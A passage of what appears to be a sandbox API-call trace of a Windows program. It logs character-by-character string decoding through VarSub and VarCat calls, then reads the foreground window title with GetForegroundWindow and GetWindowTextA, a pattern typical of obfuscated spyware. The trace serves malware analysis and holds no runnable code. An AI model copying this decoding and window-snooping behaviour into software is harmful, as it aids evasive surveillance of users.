returned 1 [0178.415] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.416] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0178.416] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.419] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.420] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.420] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0178.421] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.421] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0178.422] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.422] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0178.423] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.423] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0178.424] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.424] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0178.425] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.425] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0178.426] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.426] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0178.427] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.428] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.428] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.429] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0178.429] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.430] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0178.431] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.431] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.432] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.433] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0178.437] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.438] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0178.438] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.439] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0178.440] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.440] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0178.441] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.442] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.442] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.443] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.443] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.444] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0178.444] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.445] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.445] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.446] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.447] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.447] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0178.448] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.460] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.461] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.462] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.462] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.463] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.463] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.464] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.469] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.469] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.470] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.470] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.471] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.471] GetForegroundWindow () returned 0x20086 [0178.471] GetLastError () returned 0x0 [0178.471] SysStringLen (param_1=" ") returned 0xff [0178.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0178.472] SysStringLen (param_1=" ") returned 0xff [0178.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0178.472] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0178.472] GetLastError () returned 0x0 [0178.472] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0178.473] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0178.473] SysStringLen (param_1="Program Manager") returned 0x10 [0178.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Program Manager", cchWideChar=17, lpMultiByteStr=0x11470fc, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Program Manager", lpUsedDefaultChar=0x0) returned 17 [0178.474] SetWindowTextA (hWnd=0x103c4, lpString="Program Manager") returned 1 [0178.474] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0178.474] GetFocus () returned 0x0 [0178.474] lstrlenA (lpString="Program Manager") returned 15 [0178.474] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11470fc) returned 0x1 [0178.475] IsWindow (hWnd=0x103c4) returned 1 [0178.475] IsWindow (hWnd=0x103c4) returned 1 [0178.475] IsWindow (hWnd=0x103c4) returned 1 [0178.475] IsWindow (hWnd=0x103c4) returned 1 [0178.476] GetFocus () returned 0x0 [0178.476] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0178.477] GetFocus () returned 0x0 [0178.477] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x10) returned 0x10e1d20 [0178.477] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x10, lParam=0x10e1d20) returned 0xf [0178.477] GetFocus () returned 0x0 [0178.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0178.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x11470fc, cchWideChar=16 | out: lpWideCharStr="Program Manager") returned 16 [0178.477] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10e1d20 | out: hHeap=0x10d0000) returned 1 [0178.477] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0178.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.479] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0178.483] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.484] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0178.484] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | 